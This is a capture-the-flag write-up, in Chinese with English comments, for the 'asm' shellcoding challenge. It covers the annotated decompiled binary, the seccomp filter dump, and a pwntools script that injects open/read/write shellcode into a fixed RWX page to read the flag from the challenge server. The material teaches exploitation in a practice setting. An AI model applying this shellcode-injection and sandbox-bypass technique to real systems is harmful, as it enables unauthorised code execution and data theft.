pwnable_asm
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
64 位程序。checksec 显示 PIE 已开启，但这对利用没有影响：shellcode 所在的页是 main 里用 mmap(MAP_FIXED) 映射在固定地址 0x41414000 的，不随 PIE 变化，可以直接硬编码这个地址。
/*
 * Decompiled entry point of the challenge binary (IDA output, kept verbatim).
 * Flow: map one RWX page at a fixed address, fill it with NOPs, prepend a
 * stub, read user shellcode behind the stub, chroot, install the sandbox
 * (a seccomp filter, per the seccomp-tools dump below), then jump into the page.
 * argc/argv/envp are unused.
 */
int __cdecl main(int argc, const char **argv, const char **envp)
{
size_t v3; // rdx
char *s; // [rsp+18h] [rbp-8h]
/* glibc modes: 2 = _IONBF (unbuffered stdout), 1 = _IOLBF (line-buffered stdin). */
setvbuf(stdout, 0LL, 2, 0LL);
setvbuf(stdin, 0LL, 1, 0LL);
puts("Welcome to shellcoding practice challenge.");
puts("In this challenge, you can run your x64 shellcode under SECCOMP sandbox.");
puts("Try to make shellcode that spits flag using open()/read()/write() systemcalls only.");
puts("If this does not challenge you. you should play 'asg' challenge :)");
/*
 * One 0x1000-byte page at the fixed address 0x41414000.
 * prot 7  = PROT_READ|PROT_WRITE|PROT_EXEC (RWX).
 * flags 50 = MAP_PRIVATE(0x02)|MAP_FIXED(0x10)|MAP_ANONYMOUS(0x20).
 * The return value is not checked (MAP_FAILED would be dereferenced below).
 */
s = (char *)mmap((void *)0x41414000, 0x1000uLL, 7, 50, 0, 0LL);
/* 144 == 0x90 == x86 NOP: the whole page becomes a NOP sled. */
memset(s, 144, 0x1000uLL);
/* stub is defined elsewhere; strlen() implies it is NUL-terminated and NUL-free. */
v3 = strlen(stub);
memcpy(s, stub, v3);
printf("give me your x64 shellcode: ");
/*
 * Up to 1000 bytes of attacker input land at offset 46 of the same RWX page
 * (46 is presumably the stub length — not visible here). The byte count
 * returned by read() is ignored; short input simply leaves NOPs behind it.
 */
read(0, s + 46, 0x3E8uLL);
/* SIGALRM after 10 s kills a hung payload. */
alarm(0xAu);
/* chroot first, then the sandbox; sandbox() is defined elsewhere. */
chroot("/home/asm_pwn");
sandbox("/home/asm_pwn");
/* Transfer control to the page: stub first, then the user shellcode. */
((void (__fastcall *)(const char *))s)("/home/asm_pwn");
return 0;
}
没啥难度：程序用 mmap（flags=50，即 MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS）在固定地址 0x41414000 映射了一页，范围 0x41414000~0x41415000，
权限为 7，即 PROT_READ|PROT_WRITE|PROT_EXEC（RWX），并先用 0x90（NOP）填满整页。
程序里有沙盒（main 中的 sandbox() 调用），用 `seccomp-tools dump ./pwn` 导出的规则如下：
0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x00 0x09 0xc000003e if (A != ARCH_X86_64) goto 0011
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x35 0x00 0x01 0x40000000 if (A < 0x40000000) goto 0005
0004: 0x15 0x00 0x06 0xffffffff if (A != 0xffffffff) goto 0011
0005: 0x15 0x04 0x00 0x00000000 if (A == read) goto 0010
0006: 0x15 0x03 0x00 0x00000001 if (A == write) goto 0010
0007: 0x15 0x02 0x00 0x00000002 if (A == open) goto 0010
0008: 0x15 0x01 0x00 0x0000003c if (A == exit) goto 0010
0009: 0x15 0x00 0x01 0x000000e7 if (A != exit_group) goto 0011
0010: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0011: 0x06 0x00 0x00 0x00000000 return KILL
过滤器先要求 arch 为 x86-64（并拒绝 0x40000000 以上的 x32 ABI 调用号），白名单只有 read(0)、write(1)、open(2)、exit(60)、exit_group(231)，其余一律 KILL。所以只能用 open/read/write 把 flag 读出来；注意 openat(257) 不在白名单里，shellcode 必须走 open。
并且我们的输入正是通过 read(0, s+46, 0x3E8) 写进这同一个 RWX 页（紧跟在 stub 后面，最多 1000 字节），随后 main 直接 call 这个页，所以直接发送 orw shellcode 即可。注意 chroot 不会改变进程的 cwd，open 用的相对路径 'flag' 以进程启动时的工作目录为准，flag 的实际路径需要自行确认。
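from pwn import *
from Yapack import *
context(os='linux', arch='amd64', log_level='debug')
r, elf = rec("node4.buuoj.cn", 26379, "./pwn", 10)

# The binary mmap()s one RWX page at this fixed address (MAP_FIXED) and jumps
# into it, so it is a reliable scratch area regardless of PIE.
SHELLCODE_PAGE = 0x41414000
PAGE_SIZE = 0x1000
# Scratch buffer for the flag bytes: past the stub + payload, still inside the page.
FLAG_BUF = SHELLCODE_PAGE + 0x100
# Max bytes to read. The original used 0x30, which silently truncates a longer
# flag; the page has room up to SHELLCODE_PAGE + PAGE_SIZE.
FLAG_LEN = 0x100
assert FLAG_BUF + FLAG_LEN <= SHELLCODE_PAGE + PAGE_SIZE

# Relative path: chroot() does not change the cwd, so this resolves against the
# working directory the process was started in -- adjust if the flag lives elsewhere.
FLAG_PATH = 'flag'

# The seccomp filter only allows read(0)/write(1)/open(2)/exit/exit_group, so the
# payload is a plain open-read-write chain. shellcraft.open on amd64 emits the
# open syscall (openat would be killed by the filter); the fd comes back in rax.
# write() uses the byte count returned by read() (also in rax) instead of a fixed
# size, so the NOP filler behind the flag is not echoed.
orw_shellcode = asm(
    shellcraft.open(FLAG_PATH)
    + shellcraft.read('rax', FLAG_BUF, FLAG_LEN)
    + shellcraft.write(1, FLAG_BUF, 'rax')
)
# Input is taken with read(0, s + 46, 0x3E8): anything beyond 1000 bytes is dropped.
assert len(orw_shellcode) <= 0x3E8
sl(orw_shellcode)
ia()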